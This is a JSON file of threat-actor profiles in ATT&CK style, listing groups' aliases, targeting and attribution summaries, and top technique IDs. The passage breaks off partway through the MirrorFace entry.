{"actors": [{"name": "Kimsuky", "attack_id": "G0094", "aliases": ["Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail", "Earth Kumiho", "PatheticSlug"], "description": "Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing. Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance. DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.001", "name": "Binary Padding"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.007", "name": "Dynamic API Resolution"}, {"id": "T1027.010", "name": "Command Obfuscation"}]}, {"name": "Mustang Panda", "attack_id": "G0129", "aliases": ["Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich", "ClumsyToad"], "description": "Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam.", "top_techniques": [{"id": "T1001.003", "name": "Protocol or Service Impersonation"}, {"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1003.006", "name": "DCSync"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.007", "name": "Dynamic API Resolution"}, {"id": "T1027.012", "name": "LNK Icon Smuggling"}, {"id": "T1027.016", "name": "Junk Code Insertion"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}]}, {"name": "OilRig", "attack_id": "G0049", "aliases": ["OilRig", "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452"], "description": "OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1003.005", "name": "Cached Domain Credentials"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1008", "name": "Fallback Channels"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1025", "name": "Data from Removable Media"}, {"id": "T1027.005", "name": "Indicator Removal from Tools"}]}, {"name": "Gamaredon Group", "attack_id": "G0047", "aliases": ["Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard", "NastyShrew"], "description": "Gamaredon Group is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name Gamaredon Group derives from a misspelling of the word \"Armageddon,\" found in early campaigns. In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia’s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers.", "top_techniques": [{"id": "T1001", "name": "Data Obfuscation"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016.001", "name": "Internet Connection Discovery"}, {"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1021.005", "name": "VNC"}, {"id": "T1025", "name": "Data from Removable Media"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.004", "name": "Compile After Delivery"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.012", "name": "LNK Icon Smuggling"}, {"id": "T1027.015", "name": "Compression"}]}, {"name": "MuddyWater", "attack_id": "G0069", "aliases": ["MuddyWater", "Earth Vetala", "MERCURY", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450", "MuddyKrill"], "description": "MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1003.005", "name": "Cached Domain Credentials"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1027.004", "name": "Compile After Delivery"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1049", "name": "System Network Connections Discovery"}]}, {"name": "Wizard Spider", "attack_id": "G0102", "aliases": ["Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193", "Pistachio Tempest", "DEV-0237"], "description": "Wizard Spider is a Russia-based financially motivated threat group originally known for the creation and deployment of TrickBot since at least 2016. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021", "name": "Remote Services"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.006", "name": "Windows Remote Management"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}]}, {"name": "Scattered Spider", "attack_id": "G1015", "aliases": ["Scattered Spider", "Roasted 0ktapus", "Octo Tempest", "Storm-0875", "UNC3944"], "description": "Scattered Spider is a native English-speaking cybercriminal group active since at least 2022. The group initially targeted customer relationship management (CRM) providers, business process outsourcing (BPO) firms, and telecommunications and technology companies before expanding in 2023 to gaming, hospitality, retail, managed service provider (MSP), manufacturing, and financial sectors. Scattered Spider relies heavily on social engineering, including impersonating IT and help-desk staff, to gain initial access, bypass multi-factor authentication (MFA), and compromise enterprise networks. The group has adapted its tooling to evade endpoint detection and response (EDR) defenses and used ransomware for financial gain. Scattered Spider had expanded into hybrid cloud and identity environments, using help-desk impersonation and MFA bypass to obtain administrator access in Okta, AWS, and Office 365.", "top_techniques": [{"id": "T1003.003", "name": "NTDS"}, {"id": "T1006", "name": "Direct Volume Access"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1021.007", "name": "Cloud Services"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.004", "name": "Unix Shell"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1069", "name": "Permission Groups Discovery"}]}, {"name": "VOID MANTICORE", "attack_id": "G1055", "aliases": ["VOID MANTICORE", "COBALT MYSTIQUE", "Handala Hack", "Homeland Justice", "Karma", "Karmabelow80", "BANISHED KITTEN", "Red Sandstorm"], "description": "VOID MANTICORE is a threat group assessed to operate on behalf of Iran’s Ministry of Intelligence and Security (MOIS). Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States. VOID MANTICORE conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including HomeLand Justice in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation. VOID MANTICORE has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE’s activity.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.006", "name": "Python"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1072", "name": "Software Deployment Tools"}]}, {"name": "Chimera", "attack_id": "G0114", "aliases": ["Chimera"], "description": "Chimera is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.", "top_techniques": [{"id": "T1003.003", "name": "NTDS"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.006", "name": "Windows Remote Management"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1039", "name": "Data from Network Shared Drive"}]}, {"name": "Medusa Group", "attack_id": "G1051", "aliases": ["Medusa Group"], "description": "Medusa Group has been active since at least 2021 and was initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware’s core developers. Public sources have also referred to the group as “Spearwing” or “Medusa Actors.” Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion tactics, exfiltrating data prior to encryption and threatening to publish stolen information if ransom demands are not met. For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}]}, {"name": "Threat Group-3390", "attack_id": "G0027", "aliases": ["Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon"], "description": "Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.006", "name": "Windows Remote Management"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1030", "name": "Data Transfer Size Limits"}]}, {"name": "Dragonfly", "attack_id": "G0035", "aliases": ["Dragonfly", "TEMP.Isotope", "DYMALLOY", "Berserk Bear", "TG-4192", "Crouching Yeti", "IRON LIBERTY", "Energetic Bear", "Ghost Blizzard", "BROMINE"], "description": "Dragonfly is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16. Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.", "top_techniques": [{"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.010", "name": "Masquerade Account Name"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}]}, {"name": "TeamTNT", "attack_id": "G0139", "aliases": ["TeamTNT"], "description": "TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.", "top_techniques": [{"id": "T1007", "name": "System Service Discovery"}, {"id": "T1014", "name": "Rootkit"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1048", "name": "Exfiltration Over Alternative Protocol"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1057", "name": "Process Discovery"}]}, {"name": "APT38", "attack_id": "G0082", "aliases": ["APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM"], "description": "APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau. Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext and Banco de Chile ; some of their attacks have been destructive. North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.003", "name": "Rename Legitimate Utilities"}, {"id": "T1036.006", "name": "Space after Filename"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1053.003", "name": "Cron"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}]}, {"name": "Contagious Interview", "attack_id": "G1052", "aliases": ["Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121"], "description": "Contagious Interview is a North Korea–aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. Contagious Interview targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities.", "top_techniques": [{"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1048.003", "name": "Exfiltration Over Unencrypted Non-C2 Protocol"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.004", "name": "Unix Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.006", "name": "Python"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1071.003", "name": "Mail Protocols"}]}, {"name": "APT39", "attack_id": "G0087", "aliases": ["APT39", "ITG07", "Chafer", "Remix Kitten"], "description": "APT39 is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. APT39 has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}]}, {"name": "FIN13", "attack_id": "G1016", "aliases": ["FIN13", "Elephant Beetle"], "description": "FIN13 is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. FIN13 achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1016.001", "name": "Internet Connection Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1021.006", "name": "Windows Remote Management"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}]}, {"name": "Leviathan", "attack_id": "G0065", "aliases": ["Leviathan", "MUDCARP", "Kryptonite Panda", "Gadolinium", "BRONZE MOHAWK", "TEMP.Jumper", "APT40", "TEMP.Periscope", "Gingham Typhoon"], "description": "Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company. Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027.001", "name": "Binary Padding"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1055.001", "name": "Dynamic-link Library Injection"}, {"id": "T1059.001", "name": "PowerShell"}]}, {"name": "UNC3886", "attack_id": "G1048", "aliases": ["UNC3886"], "description": "UNC3886 is a China-nexus cyberespionage group that has been active since at least 2022, targeting defense, technology, and telecommunication organizations located in the United States and the Asia-Pacific-Japan (APJ) regions. UNC3886 has displayed a deep understanding of edge devices and virtualization technologies through the exploitation of zero-day vulnerabilities and the use of novel malware families and utilities.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1008", "name": "Fallback Channels"}, {"id": "T1014", "name": "Rootkit"}, {"id": "T1021.004", "name": "SSH"}, {"id": "T1027.005", "name": "Indicator Removal from Tools"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1037", "name": "Boot or Logon Initialization Scripts"}, {"id": "T1037.004", "name": "RC Scripts"}, {"id": "T1040", "name": "Network Sniffing"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}]}, {"name": "BlackByte", "attack_id": "G1043", "aliases": ["BlackByte", "Hecamede"], "description": "BlackByte is a ransomware threat actor operating since at least 2021. BlackByte is associated with several versions of ransomware also labeled BlackByte Ransomware. BlackByte ransomware operations initially used a common encryption key allowing for the development of a universal decryptor, but subsequent versions such as BlackByte 2.0 Ransomware use more robust encryption mechanisms. BlackByte is notable for operations targeting critical infrastructure entities among other targets across North America.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1036.008", "name": "Masquerade File Type"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1055", "name": "Process Injection"}]}, {"name": "Ember Bear", "attack_id": "G1003", "aliases": ["Ember Bear", "UNC2589", "Bleeding Bear", "DEV-0586", "Cadet Blizzard", "Frozenvista", "UAC-0056"], "description": "Ember Bear is a Russian state-sponsored cyber espionage group that has been active since at least 2020, linked to Russia's General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155). Ember Bear has primarily focused operations against Ukrainian government and telecommunication entities, but has also operated against critical infrastructure entities in Europe and the Americas. Ember Bear conducted the WhisperGate destructive wiper attacks against Ukraine in early 2022. There is some confusion as to whether Ember Bear overlaps with another Russian-linked entity referred to as Saint Bear. At present available evidence strongly suggests these are distinct activities with different behavioral profiles.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021", "name": "Remote Services"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}]}, {"name": "Ke3chang", "attack_id": "G0004", "aliases": ["Ke3chang", "APT15", "Mirage", "Vixen Panda", "GREF", "Playful Dragon", "RoyalAPT", "NICKEL", "Nylon Typhoon"], "description": "Ke3chang is a threat group attributed to actors operating out of China. Ke3chang has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1003.003", "name": "NTDS"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1020", "name": "Automated Exfiltration"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1033", "name": "System Owner/User Discovery"}]}, {"name": "Earth Lusca", "attack_id": "G1006", "aliases": ["Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX"], "description": "Earth Lusca is a suspected China-based cyber espionage group that has been active since at least April 2019. Earth Lusca has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some Earth Lusca operations may be financially motivated. Earth Lusca has used malware commonly used by other Chinese threat groups, including APT41 and the Winnti Group cluster, however security researchers assess Earth Lusca's techniques and infrastructure are separate.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.006", "name": "DCSync"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1053.005", "name": "Scheduled Task"}]}, {"name": "APT3", "attack_id": "G0022", "aliases": ["APT3", "Gothic Panda", "Pirpi", "UPS Team", "Buckeye", "Threat Group-0110", "TG-0110"], "description": "APT3 is a China-based threat group that researchers have attributed to China's Ministry of State Security. This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.005", "name": "Indicator Removal from Tools"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036.010", "name": "Masquerade Account Name"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}]}, {"name": "LAPSUS$", "attack_id": "G1004", "aliases": ["LAPSUS$", "DEV-0537", "Strawberry Tempest"], "description": "LAPSUS$ is cyber criminal threat group that has been active since at least mid-2021. LAPSUS$ specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.", "top_techniques": [{"id": "T1003.003", "name": "NTDS"}, {"id": "T1003.006", "name": "DCSync"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1069.002", "name": "Domain Groups"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1078.004", "name": "Cloud Accounts"}, {"id": "T1087.002", "name": "Domain Account"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1098.003", "name": "Additional Cloud Roles"}, {"id": "T1111", "name": "Multi-Factor Authentication Interception"}, {"id": "T1114.003", "name": "Email Forwarding Rule"}]}, {"name": "MirrorFace", "attack_id": "G1054", "aliases": ["MirrorFace", "Earth Kasha"], "description": "MirrorFace is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the menuPass umbrella based on targeting, tools, and infrastructure overlaps. MirrorFace has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent MirrorFace operations included targets in Central Europe and featured use of LODEINFO, HiddenFace, and UPPERCUT malware.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account 